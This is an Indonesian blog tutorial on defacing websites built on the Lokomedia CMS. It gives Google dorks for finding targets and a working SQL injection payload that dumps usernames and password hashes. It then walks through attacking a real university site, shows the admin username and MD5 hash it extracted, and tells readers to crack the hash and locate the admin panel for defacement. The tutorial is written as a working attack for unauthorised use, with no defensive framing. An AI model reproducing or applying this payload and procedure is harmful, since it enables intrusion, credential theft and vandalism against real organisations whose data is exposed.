Tutorial Deface Metode SQL Lokomedia


Hii sobat kali ini saya akan membagikan tutorial kepada kalian, tutorial kali ini kita akan bahas Deface Metode SQL Lokomedia.

Yukk Gasken aja sobat..

Bahan Bahan yang kalian perlukan :
  • Hp/Pc
  • Internet

Untuk Dork Nya :

inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html

Kurang banyak? bisa kalian lihat lebih banyak (Klik Disini)

Exploit Nya :
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3c6c693e,0x3c2f7469746c653e,username,password)),@)--+

Step by Step :
1. Yang Pertama kalian dorking dulu di google dengan Dork yang di atas. Setelah kalian dorking pilih salah satu web.
2. Disini saya menemukan target http://iad.unmul.ac.id/statis-1-profil.html

Lalu kalian tambahkan exploit nya di belakang angka contoh http://iad.unmul.ac.id/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3c6c693e,0x3c2f7469746c653e,username,password)),@)--+-profil.html

2. Lalu kalian enter maka nanti ada username dan pass nya contoh gambar di bawah.
Username: admin
Password: 70a35d7846649eb4e50d1e5d4d567b40

Nah itu saya dapat user dan pass nya langsung tanpa saya tambahkan view-source:

Ada cara ke dua untuk mencari user dan pass nya dengan cara tambahkan view-source: di bagian depan url.

Contoh : view-source:iad.unmul.ac.id/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3c6c693e,0x3c2f7469746c653e,username,password)),@)--+-profil.html
3. Jika sudah ketemu user dan pass nya tapi masih berbentuk md5. Lalu kalian pergi ke Md5 Hash untuk mengehash password nya biar jadi semula.

Web Untuk Hash Nya :
Link 1 :

Link 2

Dan setelah kalian hash dan ketemu password semula nya. Maka kalian cari adlog nya contoh.

https://site.com/admin
https://site.com/adminweb
https://site.com/adminlogin.php

Atau kalian bisa gunakan dengan Apk (Admin Finder)


Good Luck!!!

Belum ada Komentar untuk "Tutorial Deface Metode SQL Lokomedia"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel